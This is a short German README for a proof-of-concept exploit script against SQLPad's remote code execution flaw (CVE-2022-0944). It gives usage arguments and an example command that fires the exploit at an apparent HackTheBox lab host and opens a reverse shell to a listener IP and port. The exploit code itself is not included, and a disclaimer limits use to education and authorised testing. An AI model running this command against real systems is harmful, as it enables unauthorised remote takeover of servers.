
Proof-of-Concept-Exploit für SQLPad RCE (CVE-2022-0944), der eine Reverse Shell zum Rechner des Angreifers auslöst, vorgesehen für autorisierte Sicherheitstests und zu Bildungszwecken.
Proof-of-Concept-Exploit für SQLPad RCE (CVE-2022-0944), der zu einer RCE mit einer Reverse Shell auf den Rechner des Angreifers führt.
usage: script.py URL IP PORT
positional arguments:
URL URL to SQLPad
IP Listener host address for reverse shell
PORT Listener port for reverse shell
Beispiel:
# trigger exploit
./script.py http://admin.sightless.htb 10.10.11.2 443
Dieses Repository enthält Tools, die ausschließlich zu Bildungszwecken entwickelt wurden, insbesondere für den Einsatz in Cybersicherheits-Lernumgebungen. Der Autor dieses Codes übernimmt keine Verantwortung für irgendwelche Konsequenzen, die aus der Nutzung, dem Missbrauch oder der Modifikation dieses Codes entstehen. Der Code wird „as is“ ohne jegliche Gewährleistung, weder ausdrücklich noch implizit, bereitgestellt, einschließlich, aber nicht beschränkt auf die stillschweigenden Garantien der Marktgängigkeit oder der Eignung für einen bestimmten Zweck.